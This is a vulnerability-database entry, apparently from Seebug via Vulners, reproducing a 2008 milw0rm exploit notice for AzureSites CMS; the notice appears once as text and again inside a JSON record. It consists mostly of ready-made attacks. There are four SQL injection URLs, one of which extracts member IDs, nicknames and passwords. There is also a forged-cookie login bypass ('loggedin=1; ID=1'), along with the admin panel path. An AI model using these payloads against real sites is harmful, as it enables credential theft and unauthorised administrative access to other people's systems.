Search...

azuresites cms Multiple Vulnerabilities

2014-07-01T00:00:00

ID SSV:65436
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###############################################################
#
#        AzureSites CMS - Multiple Vulnerabilities
#
#   Vulnerabilities discovered by: Lidloses_Auge
#   Greetz to:                     -=Player=- , Suicide, g4ms3, enco,
#                                  GPM, Free-Hack, Ciphercrew, h4ck-y0u
#   Date:                          26.05.2008
#
###############################################################
#
#   Vulnerabilities:
#
#   1.) SQL Injection
#
#      1.1.) [Target]/index.php?page=null&#39;union+select+1,2,3,4,5,concat_ws(0x202d20,id,nickname,password),7,8+from+members/*
#      1.2.) [Target]/index.php?page=null&lang=null&#39;union+select+1,2,3,4,5,6,7,8/*
#      1.3.) [Target]/index.php?action=view_item&view_id=429&id_cat=null+union+select+1,2,3,4,5,6,7,8/*
#      1.4.) [Target]/index.php?action=view_item&view_id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
#
#   2.) Insecure Cookie Handling
#
#      2.1.) Cookie: loggedin=1; ID=1
#
#   Notes:
#
#      SQL Injection:
#
#         The count of columns could be different. It depends on the injection. Some of them are Blind Injections.
#
#      Insecure Cookie Handling:
#
#         Use &#34;Live HTTP Headers&#34; to change the Cookie Value in the Header.
#         The ID depends on the UserID, you want to login with.
#         Admin Panel can be found at: [Target]/azureadmin/index.php
#
###############################################################

# milw0rm.com [2008-05-31]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-65436", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "azuresites cms Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65436", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ###############################################################\n#\n# AzureSites CMS - Multiple Vulnerabilities\n#\n# Vulnerabilities discovered by: Lidloses_Auge\n# Greetz to: -=Player=- , Suicide, g4ms3, enco,\n# GPM, Free-Hack, Ciphercrew, h4ck-y0u\n# Date: 26.05.2008\n#\n###############################################################\n#\n# Vulnerabilities:\n#\n# 1.) SQL Injection\n#\n# 1.1.) [Target]/index.php?page=null'union+select+1,2,3,4,5,concat_ws(0x202d20,id,nickname,password),7,8+from+members/*\n# 1.2.) [Target]/index.php?page=null&lang=null'union+select+1,2,3,4,5,6,7,8/*\n# 1.3.) [Target]/index.php?action=view_item&view_id=429&id_cat=null+union+select+1,2,3,4,5,6,7,8/*\n# 1.4.) [Target]/index.php?action=view_item&view_id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*\n#\n# 2.) Insecure Cookie Handling\n#\n# 2.1.) Cookie: loggedin=1; ID=1\n#\n# Notes:\n#\n# SQL Injection:\n#\n# The count of columns could be different. It depends on the injection. Some of them are Blind Injections.\n#\n# Insecure Cookie Handling:\n#\n# Use "Live HTTP Headers" to change the Cookie Value in the Header.\n# The ID depends on the UserID, you want to login with.\n# Admin Panel can be found at: [Target]/azureadmin/index.php\n#\n###############################################################\n\n# milw0rm.com [2008-05-31]\n\n ", "id": "SSV:65436", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:56:12", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T15:56:12", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:56:12", "rev": 2}, "vulnersScore": -0.2}, "references": []}